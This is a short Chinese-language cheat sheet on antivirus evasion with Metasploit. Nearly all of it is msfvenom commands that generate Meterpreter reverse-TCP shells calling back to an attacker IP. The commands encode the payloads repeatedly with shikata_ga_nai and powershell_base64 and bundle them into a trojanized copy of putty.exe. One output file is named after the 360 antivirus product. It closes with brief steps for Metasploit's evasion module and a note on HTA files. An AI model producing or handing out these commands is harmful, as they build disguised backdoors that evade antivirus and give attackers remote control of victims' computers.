免殺2-msf免殺
1. 生成shellcode
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.227.129 LPORT=4444 -f c |
2. 生成python腳本
echo ‘密文’ | base64 -d base64解密
msfvenom -a python -p python/meterpreter/reverse_tcp LHOST=192.168.227.129 LPORT=5555 -f raw > shell.py raw 原生的可移植的可執行文件或代碼 |
3. 自編碼免殺
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.227.129 LPORT=4444 -e x86/shikata_ga_nai -i 9 -f exe -o tt.exe 優秀的編碼模塊:x86/shikata_ga_nai、cmd/powershell_base64 |
4. 自捆綁免殺(模版注入)
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.227.129 LPORT=4444 -x putty32.exe -f exe -o putty.exe -x 需要的模版 |
5. 自編碼+自捆綁免殺
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.227.129 LPORT=4444 -x putty32.exe -e x86/shikata_ga_nai -i 15 -f exe -o putty2.exe |
6. msf多重免殺
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.227.129 LPORT=4444 -e cmd/powershell_base64 -i 10 -f raw | msfvenom -a x86 --platform windows -e x86/shikata_ga_nai -i 10 -f exe -o 360.exe |
7. evasion逃避模塊
search windows/windows
use 0進入evasion中exe模塊,並顯示需要的參數
設置相關參數
run創建文件后將文件移動到/root/下面
hta:HTA是HTML Application的縮寫(HTML應用程序),是軟件開發的新概念,直接將HTML保存成HTA的格式,就是一個獨立的應用軟件。